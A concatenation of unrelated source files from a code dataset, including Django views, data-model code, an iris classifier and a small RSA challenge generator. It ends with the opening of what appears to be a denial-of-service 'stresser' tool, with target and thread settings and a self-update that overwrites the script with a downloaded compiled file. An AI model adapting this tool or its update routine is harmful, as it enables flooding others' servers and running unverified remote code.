] | permissive | publicbull/agentredrabbit | c97b98f2e95363da2e3176f5fdafcf35df55de9a | ef31c204904606bf5ef7c4060487a282e6d1d6e3 | refs/heads/master | 2021-01-18T16:19:11.763299 | 2013-09-02T12:53:51 | 2013-09-02T12:53:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,181 | py | """
The main method and signal handlers for agentredrabbit
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import logging
import os
import pickle
import signal
import sys
import threading
from config import ReadConfig
from utils import log_format
from transport import Transporter
from transport import setFailsafeQueue, getFailsafeQueue
from optparse import OptionParser
except ImportError, err:
print "ImportError", err
import sys
sys.exit(1)
log = logging.getLogger(__name__)
threads = []
shutdown_event = None
def sighandler(signum, frame):
"""
Signal handler method for agentredrabbit. Its purpose is to capture signals
such as SIGTERM, SIGHUP, SIGQUIT, SIGINT and gracefully shutdown all the
thread workers. signum and frame params are passed by `signal`
"""
log.info("Starting graceful shutdown, caught signal #%s" % signum)
global threads, shutdown_event
shutdown_event.set()
for thread in threads:
thread.join()
for thread in threads:
log.info("%s running state = %s" % (thread, thread.is_alive()))
def main():
"""
Main method for agentredrabbit. The workflow consists of parsing cmd arg,
reading config file, have logger, signal handler setup, read from any
previously dumped failsafe queue, configure thread event and lock objects,
start threads and wait till a shutdown event is trigged upon which it dumps
any leftover message from the in memory failsafe queue to a dump file.
"""
log.setLevel(logging.INFO)
parser = OptionParser(usage="%prog [-c config] [-v]",
version="%prog %s")
parser.add_option("-c", "--config",
dest="config_file", default=None,
help="config file")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="increase debug level from INFO to DEBUG")
(options, args) = parser.parse_args()
# Read config file
cfg_path = "/etc/agentredrabbit.conf"
if options.config_file is not None:
cfg_path = options.config_file
config = ReadConfig(cfg_path)
# Setup logger
log_level = logging.INFO
if options.verbose:
log_level = logging.DEBUG
logging.basicConfig(filename=config["log_file"], filemode="a",
level=log_level, format=log_format)
logging.getLogger("pika").setLevel(logging.INFO)
# Setup signal handlers
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGQUIT, sighandler)
signal.signal(signal.SIGHUP, sighandler)
queues = filter(lambda x: x.strip() != "", config["queues"].split(":"))
# Failsafe queue handling
failsafeq = {}
# Read from dump file if available
dumpfilename = config["dump_file"]
if os.path.exists(dumpfilename):
with open(dumpfilename, "rb") as dumpfile:
failsafeq = pickle.load(dumpfile)
log.info("Loaded failsafeq: " + str(failsafeq))
for queue in queues:
if not queue in failsafeq:
failsafeq[queue] = []
setFailsafeQueue(failsafeq)
# Start threads
global threads, shutdown_event
shutdown_event = threading.Event()
qlock = threading.Lock()
threadcount = int(config["workers"])
log.info("[+] Starting workers for queues: " + ", ".join(queues))
for idx, queue in enumerate(queues * threadcount):
thread = Transporter(idx, qlock, config, queue, shutdown_event)
thread.start()
threads.append(thread)
# Hang on till a shutdown event is triggered
while not shutdown_event.is_set():
signal.pause()
# Dump in failsafeq to the dump file
try:
log.info("Dumping failsafe queue")
dumpfile = open(dumpfilename, "wb")
pickle.dump(getFailsafeQueue(), dumpfile)
dumpfile.close()
except IOError, err:
log.error("Dumpiing failsafe queue failed: %s", err)
log.info("We had a clean shutdown, Bye!")
sys.exit(0)
if __name__ == "__main__":
main()
| [
"rohit.yadav@wingify.com"
] | rohit.yadav@wingify.com |
503b7f9f5bea3e416854a4403b9bb08dcf02eee1 | d07a4d928cf5c7e9826d4bd57a4aa70d1bbf9756 | /accounts/views.py | bbf666c3e281c25419c044a945392b7d6e77d7af | [
"MIT"
] | permissive | codexplore-io/django-blog | 8c197cdffd09e1966be715a30de3ff8818ad03d1 | 3305ce98a0baf2ceafdaa66d78088407d93a8258 | refs/heads/master | 2020-05-17T11:05:31.832642 | 2019-04-26T18:29:26 | 2019-04-26T18:29:26 | 183,675,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,508 | py | from django.shortcuts import render, redirect
from django.contrib.auth import get_user_model, authenticate, login, logout
from posts.models import Post
User = get_user_model()
# Create your views here.
def user_create_view(request):
if request.method == "POST":
context = {}
password1 = request.POST['password1']
password2 = request.POST['password2']
if password1 == password2:
username = request.POST['username']
email = request.POST['email']
try:
user1 = User.objects.get(username = username)
context['error'] = "Username or email is already in the system!"
return render(request, 'accounts/create.html', context = context)
except User.DoesNotExist:
try:
user2 = User.objects.get(email = email)
context['error'] = "Username or email is already in system!"
return render(request, 'accounts/create.html', context = context)
except User.DoesNotExist:
user = User.objects.create_user(username = username, email = email, password = password1)
return redirect('posts:list')
else:
context['error'] = "Passwords must match!"
return render(request, 'accounts/create.html', context = context)
else:
return render(request, 'accounts/create.html')
def user_login_view(request):
if request.method == "POST":
context = {}
username = request.POST['username']
password = request.POST['password']
user = authenticate(username = username, password = password)
if user is not None:
login(request, user)
context['success'] = "You are logged in!"
return render(request, 'accounts/login.html', context)
else:
context['error'] = "Invalid Login"
return render(request, 'accounts/login.html', context)
else:
return render(request, 'accounts/login.html')
def user_logout_view(request):
if request.user.is_authenticated:
logout(request)
return render(request, 'accounts/logout.html')
else:
return redirect('accounts:login')
def user_profile_view(request, username):
user = User.objects.get(username=username)
posts = Post.objects.filter(author = user)
context = {'posts':posts}
return render(request, 'accounts/profile.html', context = context)
| [
"tannersiciliano@gmail.com"
] | tannersiciliano@gmail.com |
05fb3c8bc1ba86519606a3ecb9ac40cccfed17ac | 2964ced169dd32ecccd9ba37f8cf3b866ec2309b | /apps/sections/models.py | 5d58a7f86874a8ca1ff32779001ada03959a6659 | [] | no_license | GanZiB4Fun/GanZiB-Web | d876de959575967c5f95daa1f561f98ac81b8750 | cdf6f11a91548b167e764adf64e18381da0d1c1e | refs/heads/master | 2021-03-24T13:26:20.344641 | 2018-01-15T11:10:15 | 2018-01-15T11:10:15 | 116,032,699 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/1/2 16:52
# @Author : GanZiB
# @Email : ganzib4fun@163.com
# @Site :
# @File : models.py
# @Software: PyCharm
from flask_sqlalchemy import BaseQuery
from apps import db
class SectionsQuery(BaseQuery):
def getall(self):
return self.all()
def getcategory_id(self, id):
return self.get(id)
class Sections(db.Model):
__tablename__ = 'sections'
query_class = SectionsQuery
book_id = db.Column(db.Integer, db.Sequence('book_id'), autoincrement=True)
title = db.Column(db.String(255))
content = db.Column(db.String(255))
section_order = db.Column(db.Integer())
section_url = db.Column(db.String(255), primary_key=True)
book_name = db.Column(db.String(255))
path = db.Column(db.String(255))
def __init__(self, *args, **kwargs):
super(Sections, self).__init__(*args, **kwargs)
def __repr__(self):
return '<user name %r>' % self.name | [
"ganzib4fun@163.com"
] | ganzib4fun@163.com |
31ad4b8319049da0c46adfbd3bb7d1f84e6ca502 | 364cad049756c8ae0882c4bddac36d27c9b9d5c9 | /ipynb/process_KITTI_data.py | 656c1171aa4f92c91f735fd90a4bad880e7c1487 | [
"MIT"
] | permissive | GarethZhang/PointNetLK | c03ee81425248749bad670b98257b7dfa02a7c8f | c5208880e3ebfabb8f0477bd0a012c88fd316aa6 | refs/heads/master | 2020-09-08T09:24:19.371643 | 2019-11-14T07:02:53 | 2019-11-14T07:02:53 | 221,093,069 | 0 | 0 | MIT | 2019-11-12T00:07:27 | 2019-11-12T00:07:26 | null | UTF-8 | Python | false | false | 491 | py | import pykitti
import os
import numpy as np
from scipy.stats import binned_statistic
import pickle
import cv2
def make_dir_if_not_exist(path):
if not os.path.exists(path):
os.makedirs(path)
return path
def ensure_file_dir_exists(path):
make_dir_if_not_exist(os.path.dirname(path))
return path
base_dir = '/home/haowei/Documents/files/research/datasets/KITTI/dataset'
sequences = ["04"]
for seq in sequences:
data = pykitti.odometry(base_dir, seq, frames=None) | [
"gareth.zhang@mail.utoronto.ca"
] | gareth.zhang@mail.utoronto.ca |
aedf4a7758d37e8f75483ebed1e2b39b589cc08d | c25ba294568ac36a04ae241511dbe012b3eaccfb | /Server/20180916213520426/Python/Server/Mark.py | bf976db936969b8c0211cf4b42c24236795d288b | [] | no_license | biabeniamin/CatalogScolarTeams | 1a502bc78c63be1a61ec5917835e2319bb7402dc | 247005895379683c510866500bb4a9ebf088c6c5 | refs/heads/master | 2023-02-16T16:58:46.333565 | 2021-01-19T19:59:02 | 2021-01-19T19:59:02 | 320,657,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,974 | py | #generated automatically
from sqlalchemy.orm import backref, relationship
from sqlalchemy.orm import validates
from SqlAlchemy import Base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import *
from sqlalchemy.dialects.mysql import DOUBLE
from ValidationError import ValidationError, validate_integer
from flask_restful import reqparse
import datetime
from math import floor
from Teacher import Teacher, getTeachers, getTeachersByTeacherId
from Student import Student, getStudents, getStudentsByStudentId
from Classe import Classe, getClasses, getClassesByClasseId
class Mark(Base):
@declared_attr
def __tablename__(cls):
return 'Marks'
#Fields
markId = Column('MarkId', Integer, primary_key=True)
value = Column('Value', Integer)
date = Column('Date', DateTime)
creationTime = Column('CreationTime', DateTime, default=datetime.datetime.utcnow)
#Foreign Fields
classeId = Column('ClasseId', Integer, ForeignKey("Classes.ClasseId"))
classes = relationship(Classe,backref = backref('marks'))
classe = null
studentId = Column('StudentId', Integer, ForeignKey("Students.StudentId"))
students = relationship(Student,backref = backref('marks'))
student = null
teacherId = Column('TeacherId', Integer, ForeignKey("Teachers.TeacherId"))
teachers = relationship(Teacher,backref = backref('marks'))
teacher = null
#Validation
@validates('classeId')
def validate_classeId(self, key, value):
return validate_integer(key, value, True)
@validates('studentId')
def validate_studentId(self, key, value):
return validate_integer(key, value, True)
@validates('teacherId')
def validate_teacherId(self, key, value):
return validate_integer(key, value, True)
@validates('value')
def validate_value(self, key, value):
return validate_integer(key, value, False)
#Functions
#complete classes funtion
def completeClasses(session, marks):
classes = getClasses(session)
for row in marks:
start = 0
end = len(classes)
while True:
mid = floor((start + end) / 2)
if(row.classeId > classes[mid].classeId):
start = mid + 1
elif(row.classeId < classes[mid].classeId):
end = mid - 1
elif(row.classeId == classes[mid].classeId):
start = mid + 1
end = mid - 1
row.classe = classes[mid]
if(start > end):
break
return marks
#complete students funtion
def completeStudents(session, marks):
students = getStudents(session)
for row in marks:
start = 0
end = len(students)
while True:
mid = floor((start + end) / 2)
if(row.studentId > students[mid].studentId):
start = mid + 1
elif(row.studentId < students[mid].studentId):
end = mid - 1
elif(row.studentId == students[mid].studentId):
start = mid + 1
end = mid - 1
row.student = students[mid]
if(start > end):
break
return marks
#complete teachers funtion
def completeTeachers(session, marks):
teachers = getTeachers(session)
for row in marks:
start = 0
end = len(teachers)
while True:
mid = floor((start + end) / 2)
if(row.teacherId > teachers[mid].teacherId):
start = mid + 1
elif(row.teacherId < teachers[mid].teacherId):
end = mid - 1
elif(row.teacherId == teachers[mid].teacherId):
start = mid + 1
end = mid - 1
row.teacher = teachers[mid]
if(start > end):
break
return marks
#get funtion
def getMarks(session):
result = session.query(Mark).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
#get dedicated request funtions
def getMarksByClasseIdStudentId(session, classeId, studentId):
result = session.query(Mark).filter(Mark.classeId == classeId, Mark.studentId == studentId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
def getMarksByStudentId(session, studentId):
result = session.query(Mark).filter(Mark.studentId == studentId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
def getMarksByMarkId(session, markId):
result = session.query(Mark).filter(Mark.markId == markId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
#add funtion
def addMark(session, mark):
mark.creationTime = datetime.datetime.utcnow()
session.add(mark)
session.commit()
#this must stay because sqlalchemy query the database because of this line
print('Value inserted with markId=', mark.markId)
mark.teacher = getTeachersByTeacherId(session, mark.teacherId)[0]
mark.student = getStudentsByStudentId(session, mark.studentId)[0]
mark.classe = getClassesByClasseId(session, mark.classeId)[0]
return mark
#update funtion
def updateMark(session, mark):
result = session.query(Mark).filter(Mark.markId == mark.markId).first()
result = mark
session.commit()
result = session.query(Mark).filter(Mark.markId == mark.markId).first()
result.teacher = getTeachersByTeacherId(session, result.teacherId)[0]
result.student = getStudentsByStudentId(session, result.studentId)[0]
result.classe = getClassesByClasseId(session, result.classeId)[0]
return result
#delete funtion
def deleteMark(session, markId):
result = session.query(Mark).filter(Mark.markId == markId).first()
session.delete(result)
session.commit()
return result
#API endpoints
#request parser funtion
def getmarkRequestArguments():
parser = reqparse.RequestParser()
parser.add_argument('classeId')
parser.add_argument('studentId')
parser.add_argument('teacherId')
parser.add_argument('value')
parser.add_argument('date')
return parser
| [
"biabeniamin@outlook.com"
] | biabeniamin@outlook.com |
dc19cf1d9e622a9dee15bf79c56443863a834648 | 860187a5081513d9b4a59260e4ba4e290c4f4638 | /quals/crypto/pqrsen/prob.py | 081cc3cbe2921af8625d14202f080d2196eb5057 | [
"MIT"
] | permissive | fraglantia/CTF-Arkavidia-6 | e0e89315bad16e4f2497aa93ffcc0543256166f6 | 97cc9f5d5fff158db83d9f7a411e7022c94b4b71 | refs/heads/master | 2022-04-01T13:40:26.602541 | 2020-02-14T06:10:01 | 2020-02-14T06:10:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | from Crypto.Util.number import *
from secret import *
m = bytes_to_long(flag)
p = getPrime(2048)
q = getPrime(2048)
r = inverse(pow(p,3),q)
s = (pow(p,2,p*q) - pow(q,0x10001,p*q)) % (p*q)
e = 0x10001
n = p*q
assert(m < n)
c = (pow(r*m,e,n)*inverse(s,n))% n
c = pow(c,2,n)
open("pub.key","w").writelines(map(lambda x: x + "\n", map(str, [r, s, e, n])))
open("flag.enc","w").write(str(c)) | [
"munirabdullahm@gmail.com"
] | munirabdullahm@gmail.com |
e9e335201ab716e0b4e0c4dd41ecd24d930e054d | b7eb41b068614e04f38a969326f43d8f8119cb05 | /74_search_a_2d_matrix.py | ca546b4123fa5936447cab9c7edc0057dcffd1b4 | [] | no_license | YI-DING/daily-leetcode | ddfb6985bf5014886cba8d6219da243e0aa28d71 | a6d3898d900f2063302dc1ffc3dafd61eefa79b7 | refs/heads/master | 2020-05-19T06:07:21.557077 | 2019-07-19T16:31:46 | 2019-07-19T16:31:46 | 184,866,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int):
if not matrix or not matrix[0]:
return False
start, end = 0, len(matrix)-1
while start+1 < end:
mid = (start+end)//2
if matrix[mid][0] > target:
end = mid
else:
start = mid
if matrix[end][0] > target:
row, start, end = start, 0, len(matrix[0])-1
else:
row, start, end = end, 0, len(matrix[0])-1
while start+1 < end:
mid = (start+end)//2
if matrix[row][mid] > target:
end = mid
else:
start = mid
if matrix[row][start] == target:
return True
elif matrix[row][end] == target:
return True
return False
#this method uses BFS twice, first among rows then among cols
#however you could see it as len(m*n) and do binary search for only once | [
"yiding1@uchicago.edu"
] | yiding1@uchicago.edu |
123d18a02f05d17059d952a8169d5b7d13b2133e | 61bd4a9dfd606b3c9efd52f23848b7329b18a909 | /Pythonscripts/run_predictions.py | 071dc31901d1c69daae74de43dde6e21c174c466 | [] | no_license | philmcc/aistocks | e9e85dc65e5439793cc5caa4d851a9149ff762a1 | 0706ce7d63db271ee807cc1f6dba8cd178223612 | refs/heads/master | 2021-01-10T05:36:33.736881 | 2016-09-06T13:53:03 | 2016-09-06T13:53:03 | 46,048,154 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,673 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import MySQLdb as mdb
from pyfann import libfann
from datetime import date
from network_functions import save_prediction
mydate = date.today()
con = None
con = mdb.connect('localhost', 'root',
'fil1202job', 'stock');
with con:
cur = con.cursor(mdb.cursors.DictCursor)
cur1 = con.cursor()
cur2 = con.cursor()
#
# Get a list of all networks
#
cur.execute("SELECT a.id, a.group, b.ticker, b.predict_data, a.net_file FROM `network`.`network` a, network.net_group b where a.group = b.id;")
rows = cur.fetchall()
for row in rows:
#
# For each network get the training data - only most recent data at the moment
#
#seldate = "select latest_prediction from network.network where id = " + str(row["id"])
#cur2.execute(seldate)
#latestdate = cur2.fetchone()
#latestdate1 = latestdate[0]
#print latestdate1
cur1.execute(row["predict_data"])
for row1 in cur1.fetchall():
#
# Extract Date
#
mydate = row1[(len(row1) - 1)]
row1b = list(row1)
del row1b[(len(row1b) - 1)]
#
# Set up network
#
ann = libfann.neural_net()
ann.create_from_file(row["net_file"])
#
# Run Prediction
#
print ann.run(row1b)
prediction = ann.run(row1b)
prediction = str(prediction).translate(None, '[]')
#
# Store results in db - Function
#
save_prediction(row["id"], mydate, prediction)
| [
"pmcclarence@iparadigms.com"
] | pmcclarence@iparadigms.com |
2e897d9ec97d05599a782b93f0e1b52ef8e1ba62 | f9fb4f8073d963c349679e7f40b73dc711160991 | /py-casanova/Lesson2/exo_cc_lesson_2.py | d2dd6e44d1cc887025ca1997ed65bdfb2c64fd21 | [] | no_license | ouedraogoboukary/starter-kit-datascience | 83606196fc19cc3385ba8e846ef3014ff9e0b2e9 | f621d4a1d7826c79c7ebd3a5a07a0138199e6c82 | refs/heads/master | 2020-10-01T01:04:23.460810 | 2017-12-04T22:33:52 | 2017-12-04T22:33:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,621 | py | #! /usr/bin/python3.5
import unittest
# Given a string and a non-negative int n, return a larger string
# that is n copies of the original string.
def string_times(string, n):
if not(isinstance(n, int)):
return "bad argument"
if not(isinstance(string, str)):
return "bad argument"
return n * string
# Given an array of ints, return True if one of the first 4 elements
# in the array is a 9. The array length may be less than 4.
def array_front9(nums):
return(9 in nums[0:4])
# Given a string, return the count of the number of times
# that a substring length 2 appears in the string and also as
# the last 2 chars of the string, so "hixxxhi" yields 1 (we won't count
# the end substring).
# (i.e. prendre les 2 derniers caractères comme pattern)
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
count = 0
if(string[-2:] in string[0:-2]):
count += 1
return count
"""
""" Rq: non glissant (i.e. sans compter les overlaps)
def last2(string):
return string[0:-2].count(string[-2:])
"""
""" Glissant """
def last2(string):
count = 0
windows = [string[i:i + 2] for i in range(len(string[0:-2]))]
for window in windows:
if(window == string[-2:]):
count += 1
return count
# Write a program that maps a list of words into a list of
# integers representing the lengths of the correponding words.
def length_words(array):
return list(map(lambda x: len(x), array))
# write fizbuzz programm
def fizbuzz():
for i in range(100):
if(i % 15 == 0):
print(i, "fizzbuzz")
if(i % 3 == 0 and i % 15):
print(i, "fizz")
if(i % 5 == 0 and i % 15):
print(i, "buzz")
# Write a function that takes a number and returns a list of its digits.
def number2digits(number):
return [int(d) for d in str(number)]
# Write function that translates a text to Pig Latin and back.
# English is translated to Pig Latin by taking the first letter of every word,
# moving it to the end of the word and adding 'ay'
def pigLatin(text):
out = ""
words = text.split(" ")
for word in words:
wordlist = list(word)
wordlist.append(wordlist[0])
wordlist[0] = ""
wordlist = "".join(wordlist)
out += str(wordlist) + "ay" + " "
return out.lower().rstrip().capitalize()
# Here's our "unit tests".
class Lesson1Tests(unittest.TestCase):
def testArrayFront9(self):
self.assertEqual(array_front9([1, 2, 9, 3, 4]), True)
self.assertEqual(array_front9([1, 2, 3, 4, 9]), False)
self.assertEqual(array_front9([1, 2, 3, 4, 5]), False)
def testStringTimes(self):
self.assertEqual(string_times('Hel', 2), 'HelHel')
self.assertEqual(string_times('Toto', 1), 'Toto')
self.assertEqual(string_times('P', 4), 'PPPP')
def testLast2(self):
self.assertEqual(last2('hixxhi'), 1)
self.assertEqual(last2('xaxxaxaxx'), 1)
self.assertEqual(last2('axxxaaxx'), 2)
def testLengthWord(self):
self.assertEqual(length_words(['hello', 'toto']), [5, 4])
self.assertEqual(length_words(
['s', 'ss', '59fk', 'flkj3']), [1, 2, 4, 5])
def testNumber2Digits(self):
self.assertEqual(number2digits(8849), [8, 8, 4, 9])
self.assertEqual(number2digits(4985098), [4, 9, 8, 5, 0, 9, 8])
def testPigLatin(self):
self.assertEqual(pigLatin("The quick brown fox"),
"Hetay uickqay rownbay oxfay")
def main():
unittest.main()
if __name__ == '__main__':
main()
| [
"pycasa@gmail.com"
] | pycasa@gmail.com |
beeb994bc275b0d7566e4102cb3cde213340d3ed | d7ae1e6da46ae8198aedff8c3a21db09c6829083 | /my1021_2_2.py | 54c29253165b444ada0bfbc5961cdaa67d83bc64 | [] | no_license | Aminoragit/Mr.noobiest | b503bbeac2777cd2fe6c5ba24d032f2204fe7bde | 5070e7c3215c8a6400879e52e55f47125bfca268 | refs/heads/master | 2022-03-26T18:22:31.989429 | 2019-12-27T00:31:08 | 2019-12-27T00:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | string_object = "python programming"
for ch in string_object :
print(ch)
| [
"noreply@github.com"
] | Aminoragit.noreply@github.com |
e15132e5771bf4da3f169285b889ad3627901912 | 63fdf9369b28cf956789a374ab9e237da250ab82 | /forgebox/ftorch/train.py | fc18cc026af955dc054aca3143e6fb4fdc7d2605 | [] | no_license | raynardj/forge | a9fc66a9cc6d08856a2ca83f4c6f6e76058ad8e9 | 81a10c443b31ed13dd615f58a4f322657e656244 | refs/heads/master | 2023-07-06T08:53:14.453836 | 2019-08-26T07:53:27 | 2019-08-26T07:53:27 | 168,506,241 | 7 | 0 | null | 2023-06-22T19:59:32 | 2019-01-31T10:24:54 | Python | UTF-8 | Python | false | false | 2,623 | py | import __main__ as main
from torch.utils.data import DataLoader
from collections import namedtuple
try:
JUPYTER = True if main.get_ipython else False
except:
JUPYTER = False
if JUPYTER: from tqdm import tqdm_notebook as tn
TrainerBatch = namedtuple("TrainerBatch", ("epoch", "i", "data", "trainer"))
from forgebox.train import Trainer as Universal_Trainer
class Trainer(Universal_Trainer):
def __init__(self, dataset, val_dataset=None, batch_size=16, fg=None,
print_on=20, fields=None, is_log=True, shuffle=True, num_workers=4,
conn=None, modelName="model", tryName="try", callbacks=[], val_callbacks=[]):
"""
Pytorch trainer
fields: the fields you choose to print out
is_log: writing a log?
Training:
write action function for a step of training,
assuming a generator will spit out tuple x,y,z in each:
then pass the function to object
t=Trainer(...)
t.train(epochs = 30)
@t.step_train
def action(batch):
x,y,z = batch.data
x,y,z = x.cuda(),y.cuda(),z.cuda()
#optimizer is a global variable, or many different optimizers if you like
sgd.zero_grad()
adam.zero_grad()
# model is a global variable, or many models if you like
y_ = model(x)
y2_ = model_2(z)
...... more param updating details here
return {"loss":loss.data[0],"acc":accuracy.data[0]}
same work for validation:trainer.val_action = val_action
conn: a sql table connection, (sqlalchemy). if assigned value, save the record in the designated sql database;
"""
train_data = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
val_data = DataLoader(val_dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers) if val_dataset else None
train_len = len(train_data)
val_len = len(val_data) if val_data else None
super().__init__(train_data, train_len=train_len, val_data=val_data, val_len=val_len,
fg=fg, print_on=print_on, fields=fields,
is_log=is_log, conn=conn, modelName=modelName,
tryName=tryName, callbacks=callbacks, val_callbacks=val_callbacks
)
| [
"raynard@rasenn.com"
] | raynard@rasenn.com |
f789b859c8548d0cde3a2a1d0d92f48e291ed514 | 3d12a844953e83b3ae13b1788fedf8cce5d33de9 | /program.py | a76c6d7312b50ae2c5d070b6cfb746b2b43d1d1e | [] | no_license | karthik0500/analyze | 8cd14ff01d8dea77564ad778cd752823a102fe71 | 9de5da46c994f65a307ca5a98ae45ff64020c614 | refs/heads/main | 2023-06-11T04:36:26.448762 | 2021-07-04T04:36:51 | 2021-07-04T04:36:51 | 382,659,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py |
import streamlit as st
import sklearn
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.ensemble import RandomForestClassifier
st.write("""Simple Iris Flower Prediction""")
st.sidebar.header('User Input parameter')
def User_Input_Features():
sepal_length = st.sidebar.slider('sepal_length',4.3, 7.9, 5.4)
sepal_width = st.sidebar.slider('sepal_width',3.5, 7.9, 5.4)
petal_length = st.sidebar.slider('petal_length',1.4, 7.9, 5.4)
petal_width = st.sidebar.slider('petal_width',0.2, 7.9, 5.4)
data = { 'sepal_length' :sepal_length ,
'sepal_width':sepal_width,
'petal_length' : petal_length,
'petal_width' : petal_width
}
features = pd.DataFrame(data,index = [0])
return features
df = User_Input_Features()
st.subheader('User Input Parameter')
st.write(df)
iris = datasets.load_iris()
x= iris.data
y = iris.target
classify = RandomForestClassifier()
classify.fit(x,y)
prediction = classify.predict(df)
prediction_probability = classify.predict_proba(df)
st.subheader('class label and their corresponding index number')
st.write(iris.target_names)
st.subheader('Prediction')
st.write(iris.target_names[prediction])
st.subheader('Prediction Probability')
st.write(prediction_probability)
st.bar_chart(prediction_probability)
| [
"noreply@github.com"
] | karthik0500.noreply@github.com |
a76f854b2570b8c9af51c1adba282901b8e156a8 | 71f6cc279029dde917e9d4e51abc8a30927eb520 | /rename_1d.py | 7bd596f84a1443eb11d8b957048e9e0b0a6a909a | [] | no_license | threeHardWorker/auto_tbdata | c2a03a4fb810c904c24c026b8730ea00ef07222e | b5371d7bca2ab80d8e340dce8bda3a07945af1f1 | refs/heads/master | 2020-03-18T17:29:42.143475 | 2018-05-27T09:27:56 | 2018-05-27T09:27:56 | 135,032,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | import os
import sys
if len(sys.argv) != 3:
print('Usage: reanme.py <start date> <end date>\n')
exit(0)
path = 'c:\\tmp\\csv'
s = '10秒'
d = '10s_' + sys.argv[1] + '_' + sys.argv[2]
fs = os.listdir(path)
for f in fs:
os.rename(path + '\\' + f,
path + '\\' + f.replace(s, d)) | [
"stoneguo@126.com"
] | stoneguo@126.com |
5bfdfd70e551c90834a8033de5bf56429dacecac | b5e5792c66d61af45b9f93b1a289045f9dbbab96 | /api/migrations/0005_auto_20200509_0112.py | 1e84495100ebf6da261816be2b48bf2d4190df60 | [] | no_license | frankiegu/ecust_annotation | 4c39da1ac4ae643d388f6859f79195139634d2b0 | 115a15942c0ca3b32f06f74d23b3bce6c5ed0163 | refs/heads/master | 2022-10-12T04:15:25.272851 | 2020-05-11T00:39:57 | 2020-05-11T00:39:57 | 295,602,620 | 0 | 3 | null | 2020-09-15T03:19:14 | 2020-09-15T03:19:13 | null | UTF-8 | Python | false | false | 730 | py | # Generated by Django 2.2.5 on 2020-05-09 01:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20200508_0951'),
]
operations = [
migrations.AddField(
model_name='dic',
name='standard',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Standard'),
),
migrations.AlterField(
model_name='dic',
name='entity_template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Entity_template'),
),
]
| [
"kyrieming@126.com"
] | kyrieming@126.com |
cb51efd3406c8c2cc66cb2f9fbe807f889d82670 | ae043a0200f4dc087c30b2cadddc98d63577df71 | /scripts/Rigging/create_Obj.py | 463f6e7ea6ef48ab98c94840416b63b34ab1128b | [] | no_license | RiggerLiuqi/lqMayaScript | b7ba2dfcfc1a3581beedbba6d70ca0e68282cb38 | cb51742fa712b783744e6192f5b29b43155f392d | refs/heads/master | 2022-06-24T04:03:19.898782 | 2020-05-10T18:33:05 | 2020-05-10T18:33:05 | 262,835,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-#
# -------------------------------------------------------------------------------#
# .@FileName: create_Obj
# .@Author: CousinRig67
# .@Date: 2020-04-20
# .@Contact: 842076056@qq.com
# -------------------------------------------------------------------------------#
from createObjectAtAvg import createObject
def main(*args):
obj_ui = createObject.craObjAtAvg() | [
"842076056@qq.com"
] | 842076056@qq.com |
5805016b6deb1eb7bbccac74feb8dc8aebe20e1f | 682a16bc7705f16af80b87775780ecb41c7fb1d5 | /rs.py | 353aa60f04c850e268adb741b2de57ce7e5e8d74 | [
"MIT"
] | permissive | dannydeleon8998/RapeStresser | 4e4feea9d306c24ce4ca1575e4d6857e1c3eb4c5 | 3521997cb3baff5fd4955ca5fa4edc2d41f675b4 | refs/heads/master | 2022-04-27T07:39:55.382610 | 2020-04-28T02:29:29 | 2020-04-28T02:29:29 | 259,509,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,555 | py | # MIT LICENCE Taguar258 2020
# Please read the Licence to know your permissions.
argvexit = False
try:
import socket
import os
import sys
import time
from threading import Thread
import urllib2
import re
import redis
import pickle
import wget
import nmap
try:
import readline
except:
pass
import requests
except Exception as e:
print("Imports could not be done/missing imports.")
print("All imports of file: (socket, os, sys, time, threading, urllib2, pickle, re), redis, wget, nmap.")
print(e)
sys.exit()
if argvexit:
sys.exit()
try:
if "--update" == sys.argv[1]:
try:
os.system("rm -i %s" % sys.argv[0])
wget.download("https://github.com/Taguar258/Raven-Storm/blob/master/rs.pyo?raw=true ")
os.system("mv rs.pyo?raw=true %s" % sys.argv[0])
except:
print("Error.")
sys.exit()
except:
pass
rsversion = "2.8"
ip = ""
port = 80
messages = 'hello its me, rs'
threads = 160
rtxt = 1
messagezw = messages
sleepy = 0
timeforstress = 0.5
stresserror = "false"
stressstep = 2
runactive = 'true'
outtxt = "true"
outtxtmute = False
zwouttxt = "true"
modeh = "false"
stress = "false"
stresstestvar = 1
setmb = 0
helphelp = 'true'
